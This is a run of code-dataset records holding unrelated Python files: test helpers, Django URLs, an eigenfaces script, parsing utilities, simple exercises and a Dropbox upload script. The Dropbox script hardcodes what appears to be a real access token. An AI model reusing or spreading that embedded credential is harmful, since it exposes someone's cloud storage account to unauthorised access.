Alias `{alpha_3.__name__}` doesn't \"\n \"look like alpha-3 country code.\"\n )\n\n def assertHoliday(self, *args):\n \"\"\"Assert each date is a holiday.\"\"\"\n\n holidays, dates = self._parse_arguments(args)\n for dt in dates:\n self.assertIn(dt, holidays, dt)\n\n def assertHolidayDates(self, *args):\n \"\"\"Assert holiday dates exactly match expected dates.\"\"\"\n\n holidays, dates = self._parse_arguments(args)\n self._verify_type(holidays)\n\n for dt in dates: # Check one by one for descriptive error messages.\n self.assertIn(dt, holidays, dt)\n\n self.assertEqual(\n len(dates),\n len(holidays.keys()),\n set(dates).difference(holidays.keys()),\n )\n\n def assertHolidayName(self, name, *args):\n \"\"\"Assert a holiday with a specific name exists.\"\"\"\n\n holidays, _ = self._parse_arguments(args)\n self.assertEqual(\n len(holidays.years), len(holidays.get_named(name)), name\n )\n\n def assertHolidays(self, *args):\n \"\"\"Assert holidays exactly match expected holidays.\"\"\"\n\n holidays, expected_holidays = self._parse_arguments(\n args, expand_items=False\n )\n self._verify_type(holidays)\n\n # Check one by one for descriptive error messages.\n for dt, name in expected_holidays:\n self.assertIn(dt, holidays)\n self.assertEqual(name, holidays.get(dt), dt)\n\n self.assertEqual(\n len(holidays),\n len(expected_holidays),\n set(\n (dt.strftime(\"%Y-%m-%d\"), name)\n for dt, name in holidays.items()\n ).difference((dt, name) for dt, name in expected_holidays),\n )\n\n def assertHolidaysName(self, name, *args):\n \"\"\"Assert each holiday name matches an expected one.\"\"\"\n\n holidays, dates = self._parse_arguments(args)\n for dt in dates:\n self.assertIn(name, holidays.get_list(dt))\n\n def assertNoHoliday(self, *args):\n \"\"\"Assert each date is not a holiday.\"\"\"\n\n holidays, dates = self._parse_arguments(args)\n for dt in dates:\n self.assertNotIn(dt, holidays, dt)\n\n def assertNoHolidayName(self, name, *args):\n \"\"\"Assert a holiday with a specific name doesn't exist.\"\"\"\n\n holidays, _ = self._parse_arguments(args)\n self.assertFalse(holidays.get_named(name), name)\n\n def assertNoHolidays(self, holidays):\n \"\"\"Assert holidays dict is empty.\"\"\"\n\n self._verify_type(holidays)\n\n self.assertFalse(holidays)\n self.assertEqual(0, len(holidays))\n\n\nclass SundayHolidays(TestCase):\n \"\"\"Common class to test countries with Sundays as a holidays.\"\"\"\n\n def assertSundays(self, cls):\n holidays = cls(years=1989, include_sundays=True)\n self.assertHoliday(\n holidays,\n \"1989-12-31\",\n )\n self.assertEqual(53, len([s for s in holidays if s.weekday() == SUN]))\n\n holidays = cls(years=2032, include_sundays=True)\n self.assertHoliday(\n holidays,\n \"2032-01-04\",\n )\n self.assertEqual(52, len([s for s in holidays if s.weekday() == SUN]))\n\n self.assertNoHolidays(cls(include_sundays=True))\n\n for sunday in (\n \"1989-12-31\",\n \"2017-02-05\",\n \"2017-02-12\",\n \"2032-02-29\",\n ):\n self.assertEqual(parse(sunday).weekday(), SUN)\n self.assertHoliday(holidays, sunday)\n\n for non_sunday in (\n \"2001-05-16\",\n \"2001-05-18\",\n \"2016-12-27\",\n \"2016-12-28\",\n \"2017-02-06\",\n \"2017-02-07\",\n \"2017-02-08\",\n \"2017-02-09\",\n \"2017-02-10\",\n ):\n self.assertNotEqual(parse(non_sunday).weekday(), SUN)\n self.assertNoHoliday(holidays, non_sunday)\n","sub_path":"tests/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 
+{"seq_id":"170548382","text":"import datetime as dt\nimport pandas as pd\nimport numpy as np\nimport pandas_datareader as pdr\nimport matplotlib.pyplot as plt\nfrom pandas.plotting import register_matplotlib_converters \nregister_matplotlib_converters()\n\nclass Analyze:\n default_date = dt.date.isoformat(dt.date.today() - dt.timedelta(397))\n \n def get_data(symbol, date=default_date):\n data = pdr.get_data_yahoo(symbol, start=date)\n return data\n \n def moving_average(df, fast=5, slow=20):\n df[str(fast)+'_day'] = df.Close.rolling(fast).mean()\n df[str(slow)+'_day'] = df.Close.rolling(slow).mean()\n \n \n def plot_MA(df):\n df['tradeSingal']=np.where(df['5_day'] > df['20_day'], 'Buy', 'Sell')\n plt.plot(df['Close'])\n plt.plot(df.filter(regex='day'))\n plt.grid(True)","sub_path":"class_final_project.py","file_name":"class_final_project.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"508663367","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 23 18:00:48 2019\n\n@author: amitabh.gunjan\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 17 16:44:45 2019\n\n@author: amitabh.gunjan\n\"\"\"\n\n\"\"\"\nCreating eigenfaces for dogs' images.\n create one data matrix and repesent an image as a row vector \n in the whola data matrix.\n\"\"\"\nfrom PIL import Image\nimport glob\n\nimage_list = []\ndata_path = 'D:/other/Programming/python/signal-processing/eigenfaces/data/humans/faces94/faces94/male/9416994/*.jpg'\nfor filename in glob.glob(data_path):\n im=Image.open(filename)\n image_list.append(im)\n\nimage_list_resized = [im.resize((180,180), Image.ANTIALIAS) for im in image_list]\nimport numpy as np\nfirst_image = image_list_resized[0]\n\n\"\"\"\nconvert to greyscale and flatten the images.\n\"\"\"\nfirst_greyscale = first_image.convert('L')\ndata_matrix = np.array([list(_image.convert('L').getdata()) for _image in image_list_resized]) # Does work like a charm. 
Use .getdata() for extracting pixel vals.\n\n\n\"\"\"\nComputing the mean image and removing the mean image from the list of images.\n\"\"\"\nmean_image = data_matrix.mean(0)\nmean_image_reshape = mean_image.reshape(180, 180)\nmean_doggo = Image.fromarray(np.uint8(mean_image_reshape), 'L')\nmean_doggo.show()\n\ndef remove_mean_image( x ):\n return x - (sum(x)/len(x))\n\ndifference_doggos = np.apply_along_axis(remove_mean_image, axis=0, arr=data_matrix )\n\ndef normalize_images(x):\n x = ((255/(x.max() - x.min()))*(x - x.max())) + 255\n return x\n\n\nnormalized_difference_doggos = np.apply_along_axis(normalize_images, axis=0, arr=difference_doggos)\n\nlist_diff_images = [Image.fromarray(np.uint8(x.reshape(180, 180)), 'L') for x in normalized_difference_doggos]\n\n#for i in list_diff_images:\n# i.show()\n \n#cov_matrix = np.cov(difference_doggos)\ncov_matrix = np.matmul(difference_doggos, difference_doggos.T)\nfrom numpy import linalg as LA\nevals, eigenvec = LA.eig(cov_matrix)\neigen_dogs_vectors = np.negative(eigenvec)\n\n\n\n\"\"\"\nGet the eigenvectors of A^T*A and reshape the evectors to create the ghost images of the doggos.\n\"\"\"\neigen_dogs_vectors_transformed = [np.transpose(difference_doggos).dot(e_doggo) for e_doggo in eigen_dogs_vectors]\neigen_dogs_vec_reshaped = [e_doggo.reshape(180, 180) for e_doggo in eigen_dogs_vectors_transformed]\n\n\"\"\"\nScale the eigenvectors back to the original scale to reproduce the images using the belwo formula\n newvalue= (max'-min')/(max-min)*(value-max)+max'\n\"\"\"\nrescaled_evectors = [((255/(_dogs.max() - _dogs.min()))*(_dogs - _dogs.max())) + 255 for _dogs in eigen_dogs_vec_reshaped]\ndogs_face_space = [Image.fromarray(np.uint8(_dogs), 'L') for _dogs in rescaled_evectors]\n\n#for i in dogs_face_space:\n# i.show()\ndef project_image_to_face_space(input_image_path, face_space):\n im=Image.open(input_image_path)\n im = im.resize((180,180), Image.ANTIALIAS)\n \n im.convert('L').show()\n image_vector = np.array(list(im.convert('L').getdata()))\n \"\"\"\n Subtract mean image from the doggo.\n \"\"\"\n# image_vector = image_vector - mean_image\n image_vector = image_vector.reshape(1, 32400)\n \n coefficients = np.dot(image_vector, face_space)\n print(coefficients)\n '''\n Instead of dot product just add the vectors after multiplying the respective coefficients. 
As provided on this website.\n https://jeremykun.com/2011/07/27/eigenfaces/\n \n '''\n reconstructed_image = np.dot(image_vector, face_space).dot(face_space.T)\n\n \"\"\"\n Add mean doggo to the reconstructed doggo.\n \"\"\"\n# reconstructed_image = np.add(reconstructed_image, mean_image.reshape(1, 32400))\n reconstructed_image_reshaped = reconstructed_image.reshape(180, 180)\n rescaled_image = ((255/(reconstructed_image_reshaped.max() - reconstructed_image_reshaped.min()))*(reconstructed_image_reshaped - reconstructed_image_reshaped.max())) + 255\n reconstructed_doggo = Image.fromarray(np.uint8(rescaled_image), 'L')\n reconstructed_doggo.show()\n return reconstructed_doggo\n\ninput_image_path = 'D:/other/Programming/python/signal-processing/eigenfaces/data/humans/faces94/faces94/male/9416994/9416994.11.jpg'\neigen_dogs_vectors_transformed_matrix = np.matrix(eigen_dogs_vectors_transformed)\neigen_dogs_vectors_transformed_matrix_t = eigen_dogs_vectors_transformed_matrix.T\nreconstructed_doggo = project_image_to_face_space(input_image_path=input_image_path, face_space=eigen_dogs_vectors_transformed_matrix_t)\n\n\nreconstructed_doggos = np.dot(np.dot(normalized_difference_doggos, eigen_dogs_vectors_transformed_matrix_t), eigen_dogs_vectors_transformed_matrix)\n\n\n\"\"\"\nGet the images reconstructed back.\n\"\"\"\nreconstructed_doggos_rescaled = [((255/(_dogs.max() - _dogs.min()))*(_dogs - _dogs.max())) + 255 for _dogs in reconstructed_doggos]\nreconstructed_images_reshaped = [e_doggo.reshape(180, 180) for e_doggo in reconstructed_doggos_rescaled]\nreconstructed_images = [Image.fromarray(np.uint8(_dogs), 'L') for _dogs in reconstructed_images_reshaped]\n#for i in reconstructed_images:\n# i.show() # Images are not exactly the same but quite alike.","sub_path":"eigenfaces/code/scratch/eigen_humans.py","file_name":"eigen_humans.py","file_ext":"py","file_size_in_byte":5051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"452711863","text":"import argparse\nimport xnmt.input_readers as input_readers\n\nfrom xnmt.graph import HyperNode, HyperEdge, HyperGraph\nfrom xnmt.sent import SyntaxTreeNode\nfrom collections import defaultdict\n\nDELIMITER = \"▁\"\n\n# Command Line Arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"conll_tree_input\")\nparser.add_argument(\"sp_input\")\nargs = parser.parse_args()\n\nclass DummyVocab:\n def __init__(self):\n self.vocab = defaultdict(lambda: len(self.vocab))\n self.backvocab = {}\n \n def convert(self, word):\n wordid = self.vocab[word]\n self.backvocab[wordid] = word\n return wordid\n \n def __getitem__(self, item):\n return self.backvocab[item]\n \n# Initialization\nsurface_vocab = DummyVocab()\nnt_vocab = DummyVocab()\nedge_vocab = DummyVocab()\nreader = input_readers.CoNLLToRNNGActionsReader(surface_vocab=surface_vocab,\n nt_vocab=nt_vocab,\n edg_vocab=edge_vocab)\n\ndef graph_to_conll(graph):\n ret = []\n for node in graph.iter_nodes():\n # 1\tcan\t_\tMD\t_\t3\taux\n pred = graph.predecessors(node.node_id, True)\n if len(pred) == 0:\n ret.append(\"{}\\t{}\\t_\\t{}\\t_\\t{}\\t{}\".format(node.node_id, node.value, node.head, 0, \"ROOT\"))\n else:\n pred_id, pred_edge = pred[0]\n ret.append(\"{}\\t{}\\t_\\t{}\\t_\\t{}\\t{}\".format(node.node_id, node.value, node.head, pred_id, pred_edge.label))\n return \"\\n\".join(ret)\n \ndef remap_id(node_list, edge_list, leaves):\n id_mapping = {}\n for i, node in enumerate(leaves):\n id_mapping[node.node_id] = i+1\n # New edge + node with new id 
mapping\n    out_node_list = {}\n    out_edge_list = []\n    for node_id, node in node_list.items():\n        out_node_list[id_mapping[node_id]] = SyntaxTreeNode(id_mapping[node_id], node.value, node.head, node.node_type)\n    for edge in edge_list:\n        out_edge_list.append(HyperEdge(id_mapping[edge.node_from],\n                                   [id_mapping[edge.node_to[0]]],\n                                   edge.features,\n                                   edge.label))\n    return HyperGraph(out_edge_list, out_node_list)\n\ndef normalize_space_at_conll(tree):\n    graph = tree.graph\n    leaves = []\n    node_list = {}\n    edge_list = []\n    now_id = graph.len_nodes\n    for edge in graph.iter_edges():\n        edge_list.append(edge)\n    edge_list = edge_list[:-1]\n    for i in range(1, graph.len_nodes):\n        node = graph[i]\n        word = node.value\n        for j, subword in enumerate(word.split()):\n            if j == 0:\n                node_list[node.node_id] = SyntaxTreeNode(node.node_id, subword, node.head, node.node_type)\n                leaves.append(node_list[node.node_id])\n            else:\n                node_list[now_id] = SyntaxTreeNode(now_id, subword, node.head, node.node_type)\n                leaves.append(node_list[now_id])\n                edge_list.append(HyperEdge(node.node_id, [now_id], None, \"[whtsp]\"))\n                now_id += 1\n    return remap_id(node_list, edge_list, leaves)\n\n# Processing\ndef normalize_sentpiece(sp, graph):\n    node_list = {}\n    edge_list = []\n    leaves = []\n    sp = sp.strip().split() + [DELIMITER]\n    # Create new hyperedge list\n    for edge in graph.iter_edges():\n        edge_list.append(edge)\n    # Routine to modify the graph structure\n    def write_changes(buffer, idx, now_id):\n        now_node = graph[idx]\n        node_list[idx] = SyntaxTreeNode(now_node.node_id, buffer[0], now_node.head, now_node.node_type)\n        leaves.append(node_list[idx])\n        for i in range(1, len(buffer)):\n            node_list[now_id] = SyntaxTreeNode(now_id, buffer[i], \"[\"+ now_node.head + \"]\", now_node.node_type)\n            edge_list.append(HyperEdge(idx, [now_id], edge.features, \"[sp]\"))\n            leaves.append(node_list[now_id])\n            now_id += 1\n        return now_id\n    # Synchronously modify the sentpiece and tree\n    idx = 0\n    buffer = []\n    now_id = graph.len_nodes + 1\n    for token in sp:\n        if DELIMITER in token:\n            if idx != 0:\n                now_id = write_changes(buffer, idx, now_id)\n                buffer.clear()\n            idx += 1\n        buffer.append(token)\n    return remap_id(node_list, edge_list, leaves)\n\ninput_tree = reader.read_sents(args.conll_tree_input)\nwith open(args.sp_input) as input_sp:\n    for sp, tree in zip(input_sp, input_tree):\n        print(graph_to_conll(normalize_sentpiece(sp, normalize_space_at_conll(tree))))\n        print()\n\n","sub_path":"script/parse/sync_conll_and_sp.py","file_name":"sync_conll_and_sp.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"633980182","text":"# -*- coding: UTF-8 -*-\nimport operator\nimport random\n\nimport jieba\nimport os\n\n\ndef TextProcessing(folder_path,test_size = 0.2):\n    folder_list = os.listdir(folder_path)\n    data_list = []\n    class_list = []\n\n    for folder in folder_list:\n        new_folder_path = os.path.join(folder_path, folder)\n        files = os.listdir(new_folder_path)\n        for file in files:\n            with open(os.path.join(new_folder_path,file) ,'r',encoding='utf-8') as f:\n                raw = f.read()\n            word_cut = jieba.cut(raw , cut_all= False)\n            word_list = list(word_cut)\n\n            data_list.append(word_list)\n            class_list.append(folder)\n\n    data_class_list = list(zip(data_list,class_list))\n    random.shuffle(data_class_list)\n    index = int(len(data_class_list) * test_size) + 1\n    train_list = data_class_list[index :]\n    test_list = data_class_list[:index]\n    train_data_list , train_class_list = zip(*train_list)\n    test_data_list , test_class_list = zip(*test_list)\n\n    all_words_dict ={}\n    for word_list in train_data_list:\n        for word in word_list:\n            if word in all_words_dict.keys():\n                all_words_dict[word] += 1\n            else:\n                all_words_dict[word] = 1\n\n    all_words_tuple_list = sorted(all_words_dict.items(),key=operator.itemgetter(1),reverse= True)\n    # all_words_tuple_list = sorted(all_words_dict,lambda f:f[1],reverse= True)\n    all_words_list, all_words_nums = zip(*all_words_tuple_list)\n    print()\n\nif __name__ == '__main__':\n    folder_path = './SogouC/Sample'  # training set directory\n    TextProcessing(folder_path)","sub_path":"com/fp/myBayes/nbc.py","file_name":"nbc.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"411320299","text":"from .tower_scene import TowerScene\nfrom .table_env import TableEnv\nfrom .table_cam_env import TableCamEnv\n\nimport numpy as np\n\nclass TowerEnv(TableEnv):\n    \"\"\" Tower environment, trajectory observation, linear tool control \"\"\"\n\n    def __init__(self, **kwargs):\n        scene = TowerScene(**kwargs)\n        super(TowerEnv, self).__init__(scene)\n\n        self.observation_space = self._make_dict_space(\n            'distance_to_target',\n            'target_position',\n            'linear_velocity',\n            'grip_forces',\n            'grip_width'\n        )\n        self.action_space = self._make_dict_space(\n            'linear_velocity',\n            # 'joint_velocity',\n            'grip_velocity'\n        )\n\n    def _get_observation(self, scene):\n        return dict(\n            tool_position=scene.robot.arm.tool.state.position[0],\n            cubes_position=scene.cubes_position,\n            distance_to_cubes =scene.distance_to_cubes,\n            linear_velocity=scene.robot.arm.tool.state.velocity[0],\n            grip_state=scene.robot.gripper.controller.state,)\n\n\nclass TowerCamEnv(TableCamEnv):\n    \"\"\" Tower environment, camera observation, linear tool control \"\"\"\n\n    def __init__(self, view_rand, gui_resolution, cam_resolution, num_cameras, **kwargs):\n        scene = TowerScene(**kwargs)\n        super(TowerCamEnv, self).__init__(scene, view_rand, gui_resolution, cam_resolution, num_cameras)\n\n        self.action_space = self._make_dict_space(\n            'linear_velocity',\n            # 'joint_velocity',\n            'grip_velocity'\n        )\n","sub_path":"mime/envs/table_envs/tower_env.py","file_name":"tower_env.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"129766312","text":"\"\"\"xsede_warehouse URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import:  from my_app import views\n    2. Add a URL to urlpatterns:  path('', views.home, name='home')\nClass-based views\n    1. Add an import:  from other_app.views import Home\n    2. Add a URL to urlpatterns:  path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. Add a URL to urlpatterns:  path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import include, url\nfrom django.conf import settings\nfrom django.contrib.auth import views\nfrom django.http import HttpResponse\nfrom . 
import views\n#from django.views.generic.simple import direct_to_template\nfrom django.views.generic import TemplateView, RedirectView\nfrom rest_framework_swagger.views import get_swagger_view\nfrom xsede_warehouse.settings import API_BASE\n\nurlpatterns_public = [\n url(r'^$', TemplateView.as_view(template_name='index.html')),\n url(r'^allocations/v1/', include('allocations.urls')),\n url(r'^glue2-db-api/v1/', include('glue2_db_api.urls')),\n url(r'^glue2-provider-api/v1/', include('glue2_provider.urls')),\n url(r'^glue2-views-api/v1/', include('glue2_views_api.urls')),\n url(r'^goendpoint-api/v1/', include('goendpoint_api.urls')),\n url(r'^monitoring-db-api/v1/', include('monitoring_db_api.urls')),\n url(r'^monitoring-provider-api/v1/', include('monitoring_provider.urls')),\n url(r'^monitoring-views-api/v1/', include('monitoring_views_api.urls')),\n url(r'^outages/v1/', include('outages.urls')),\n url(r'^processing-status/', include('processing_status.urls')),\n url(r'^projectresources/v1/', include('projectresources.urls')),\n url(r'^rdr-db/', include('rdr_db.urls')),\n url(r'^resource-api/v1/', include('resource_cat.urls')),\n url(r'^resource-api/v2/', include('resource_v2.urls')),\n url(r'^resource-api/v3/', include('resource_v3.urls')),\n url(r'^resource-status-api/v1/', include('resource_status_api.urls')),\n url(r'^speedpage/v1/', include('speedpage.urls')),\n url(r'^xcsr-db/v1/', include('xcsr_db.urls')),\n url(r'^xdcdb/v1/', include('xdcdb.urls')),\n url(r'^xdinfo/v1/', include('xdinfo.urls')),\n url(r'^warehouse-views/', include('warehouse_views.urls')),\n url(r'^home/', views.home, name='home'),\n url(r'^', include('django.contrib.auth.urls')),\n url(r'^', include('social_django.urls', namespace='social'))\n]\n\nschema_view = get_swagger_view(title='XSEDE Warehouse API', url=API_BASE, patterns=urlpatterns_public)\n\nurlpatterns_internal = [\n url(r'^admin/', admin.site.urls),\n url(r'^api-docs/', schema_view, name='swagger'),\n url(r'^debug/', include('debug.urls')),\n url(r'^favicon\\.ico$', lambda x: HttpResponse(\"User-Agent: *\\nDisallow:\", content_type=\"image/ico\"), name=\"/static/favicon.ico\"),\n url(r'^robots\\.txt$', lambda x: HttpResponse(\"User-Agent: *\\nDisallow:\", content_type=\"text/plain\"), name=\"/static/robots.txt\"),\n url(r'^$', TemplateView.as_view(template_name='index.html')),\n url(r'^info/feedback(\\.html|\\/)?$',TemplateView.as_view(template_name='feedback.html')),\n url(r'^resource-api/v3/', include('resource_v3.urls_internal')),\n]\n\nurlpatterns = urlpatterns_internal + urlpatterns_public\n","sub_path":"django_xsede_warehouse/xsede_warehouse/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"458711124","text":"# -*- coding: utf-8 -*-\nimport cgi\nimport collections\nfrom urllib.parse import parse_qsl\nfrom watson.common.contextmanagers import ignored\nfrom watson.common.datastructures import MultiDict\n\n\n__all__ = ['get_form_vars']\n\n\ndef get_form_vars(environ):\n \"\"\"Convert environ vars into GET/POST/FILES objects.\n\n Process all get and post vars from a
and return MultiDict of\n each.\n \"\"\"\n if environ['REQUEST_METHOD'] == 'PUT' and not environ.get('CONTENT_TYPE'):\n environ['CONTENT_TYPE'] = 'application/x-www-form-urlencoded'\n field_storage = cgi.FieldStorage(fp=environ['wsgi.input'], environ=environ,\n keep_blank_values=True)\n get = MultiDict()\n for name, value in parse_qsl(environ.get('QUERY_STRING'),\n keep_blank_values=True):\n get[name] = value if value else ''\n return _process_field_storage(field_storage, get=get)\n\n\nFile = collections.namedtuple(\n 'File',\n 'data filename name type type_options disposition disposition_options headers')\n\n\ndef _process_field_storage(fields, get=None, post=None, files=None):\n if not get:\n get = MultiDict()\n if not post:\n post = MultiDict()\n if not files:\n files = MultiDict()\n with ignored(Exception):\n for name in fields:\n field = fields[name] if isinstance(name, str) else name\n if isinstance(field, list):\n _process_field_storage(field, get, post, files)\n elif field.filename:\n # An uploaded file, create a new File tuple to resolve the\n # not indexable issue.\n files[field.name] = File(\n field.file,\n field.filename,\n field.name,\n field.type,\n field.type_options,\n field.disposition,\n field.disposition_options,\n field.headers)\n elif field.disposition or field.name not in get:\n post[field.name] = field.value\n else:\n if field.name not in get:\n get[field.name] = field.value\n return get, post, files\n","sub_path":"watson/http/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"409834647","text":"import dropbox\r\n \r\nclass transferdata:\r\n def __init__(self,accesstoken) :\r\n self.accesstoken=accesstoken\r\n\r\n def uploadfile(self,filefrom,fileto):\r\n dbx=dropbox.Dropbox(self.accesstoken)\r\n with open(filefrom,'rb')as f:\r\n dbx.files_upload(f.read(),fileto)\r\n\r\ndef cloud ():\r\n accesstoken=\"ZhF8ZWT4ak4AAAAAAAAAAXQfNIrPsdaaCDEOkH7KYSnISri1v5GJavIlIlHJ6RrK\" \r\n transferfile=transferdata(accesstoken) \r\n filefrom=input('enter the file name to upload: ') \r\n fileto=input('enter the file name with app name: ')\r\n\r\n transferfile.uploadfile(filefrom,fileto) \r\n print('file uploaded successfully to drop box')\r\n\r\ncloud()\r\n\r\n","sub_path":"cloudStore.py","file_name":"cloudStore.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"28861653","text":"class Solution:\n def mySqrt(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n n = 0\n while n * n <= x:\n n = n + 1\n return n - 1\n#####----------time limit\n\nclass Solution2:\n def mySqrt(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n if x == 1 or x == 0:\n return x\n begin, end, result, mid = 0, x, 0, 0\n while abs(result - x) > 0.01:\n mid = (begin + end) / 2\n result = mid * mid\n if result > x:\n end = mid\n elif result < x:\n begin = mid\n if x in range(int(mid)* int(mid), (int(mid) + 1) * (int(mid) + 1)):\n return int(mid)\n return int(mid) + 1\n###########----------dichotomy(faster)\n\nclass Solution3:\n def mySqrt(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n if x == 0:\n return 0\n pre, cur = 0.01, x\n while abs(cur - pre) > 0.01:\n pre = cur\n cur = (pre/2 + x/(2*pre))\n if x in range(int(cur)* int(cur), (int(cur) + 1) * (int(cur) + 1)):\n return int(cur)\n return int(cur) + 1\n#########-----Newton's 
method(fastest)\n#https://baike.baidu.com/item/牛顿迭代法/10887580?fr=aladdin\n\n \n\n \n \n","sub_path":"leetcode-first_time/leetcode69(sqrt).py","file_name":"leetcode69(sqrt).py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"409582617","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\n\nn=int(input('Digite o tamanho da matriz nxn: '))\na=np.zeros( (n,n) )\n\n\nfor i in range(0,n,1):\n for j in range(0,n,1):\n a[i,j]=int(input('elemento: '))\n\nsl=sum(a[i])\nsc=sum(a[j])\nsv=(sum(a[i][i]))\nif sl==sc and sc==sv:\n print('S')\nelse :\n print('N')\n\n \n \n\n","sub_path":"moodledata/vpl_data/445/usersdata/339/103120/submittedfiles/matriz2.py","file_name":"matriz2.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"26980664","text":"import channels\nimport channels.handler\nimport channels.generic.websockets\n\nimport rest_framework_jwt.serializers\nimport jwt.exceptions\n\nimport backend.models\nimport backend.serializers\nimport backend.auth\n\ndef jwt_auth(message):\n \"\"\"\n Attempt to authenticate the user through a JWT provided in\n the 'token' query parameter.\n\n :param message: The channel message object\n :return: The authenticated user, or None\n \"\"\"\n\n # Construct a fake http-like object\n # (See: https://stackoverflow.com/questions/46230340/how-to-authenticate-a-user-in-websocket-connection-in-django-channels-when-using)\n message.content.setdefault('method', 'FAKE')\n request = channels.handler.AsgiRequest(message)\n\n # Validate the token in the request in a slightly hacky way\n try:\n validated = rest_framework_jwt.serializers.VerifyJSONWebTokenSerializer().validate(request.GET)\n\n # If no exception is thrown, the token is valid. Store it in the session if it is a kit.\n return backend.auth.downcast_user_type(validated['user'])\n except (KeyError, jwt.exceptions.InvalidTokenError):\n return None\n\nclass JWTSessionAuthConsumer(channels.generic.websockets.JsonWebsocketConsumer):\n \"\"\"\n A JSON WebSocket consumer that attempts to authenticate\n a kit using JWT through a HTTP query parameter. If successful,\n places the kit name in the channel session parameter 'kit'.\n \"\"\"\n\n #: Use channel sessions, and transfer the HTTP user (from\n #: a Django session) to the channel session\n http_user_and_session = True\n\n def connect(self, message, **kwargs):\n user = jwt_auth(message)\n if isinstance(user, backend.models.Kit):\n self.message.channel_session['kit'] = user.username\n \n super().connect(message, **kwargs)\n\nclass MeasurementSubscribeConsumer(JWTSessionAuthConsumer):\n \"\"\"\n A measurement subscribe consumer. 
Any user (or kit) can\n subscribe to measurements of kits they own.\n \"\"\"\n def receive(self, content, multiplexer, **kwargs):\n # Subscribe user to kit measurement updates\n if \"kit\" not in content:\n multiplexer.send({\"error\": \"Kit to subscribe to not given.\"})\n return\n\n try:\n kit = backend.models.Kit.objects.get(username=content['kit'])\n if not self.message.user.has_perm('backend.subscribe_to_kit_measurements_websocket', kit):\n multiplexer.send({\"error\": \"Kit not found or you do not have access to it.\"})\n return\n\n channels.Group(\"kit-measurements-%s\" % kit.username).add(multiplexer.reply_channel)\n multiplexer.send({\"action\": \"subscribe\", \"kit\": kit.username})\n except:\n multiplexer.send({\"error\": \"Kit not found or you do not have access to it.\"})\n\nclass MeasurementPublishConsumer(JWTSessionAuthConsumer):\n \"\"\"\n A measurement publish consumer. Any kit can publish measurements.\n The measurements are sent to all clients who are subscribed to\n measurements of that kit.\n \"\"\"\n def receive(self, content, multiplexer, **kwargs):\n # Publish a measurement\n if \"kit\" not in self.message.channel_session:\n multiplexer.send({\"error\": \"You must be a kit to publish measurements.'.\"})\n return\n\n try:\n # Deserialize measurement\n measurement_serializer = backend.serializers.MeasurementSerializer(data=content['measurement'])\n measurement_serializer.is_valid(raise_exception = True)\n\n measurement = backend.models.Measurement(**measurement_serializer.validated_data)\n\n kit = backend.models.Kit.objects.filter(username=self.message.channel_session['kit']).get()\n\n # Get the peripheral device object by its name (if it's associated with this kit)\n peripheral = kit.peripherals.filter(name=content['measurement']['peripheral']).get()\n\n # Add peripheral to the measurement object\n measurement.peripheral = peripheral\n\n # Get the registered measurement type by the physical quantity and physical unit if it exists\n measurement_types_qs = peripheral.peripheral_definition.measurement_types.filter(physical_quantity = measurement.physical_quantity, physical_unit = measurement.physical_unit)\n if measurement_types_qs:\n measurement_type = measurement_types_qs.first()\n measurement.measurement_type = measurement_type\n\n output_serializer = backend.serializers.MeasurementOutputSerializer(measurement)\n multiplexer.send({\"success\": \"published\"})\n self.group_send(\"kit-measurements-%s\" % self.message.channel_session['kit'], output_serializer.data)\n except Exception as exception:\n multiplexer.send({\"error\": \"You must provide a valid measurement.'.\"})\n print(exception)\n","sub_path":"backend/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"314646142","text":"# task 3\n\ndef main():\n print('Check odd and even numbers in range')\n try:\n begin = int(input('begin: '))\n end = int(input('end: '))\n if begin > end:\n raise Exception('begin > end')\n print('Range {:d} - {:d}'.format(begin, end))\n odd = []\n even = []\n for number in range(begin, end+1):\n if number % 2 > 0:\n odd.append(number)\n else:\n even.append(number)\n print('odd: ', odd)\n print('even: ', even)\n except Exception as e:\n print('Error: ', e)\n finally:\n print('bye!')\n\nif __name__ == '__main__':\n 
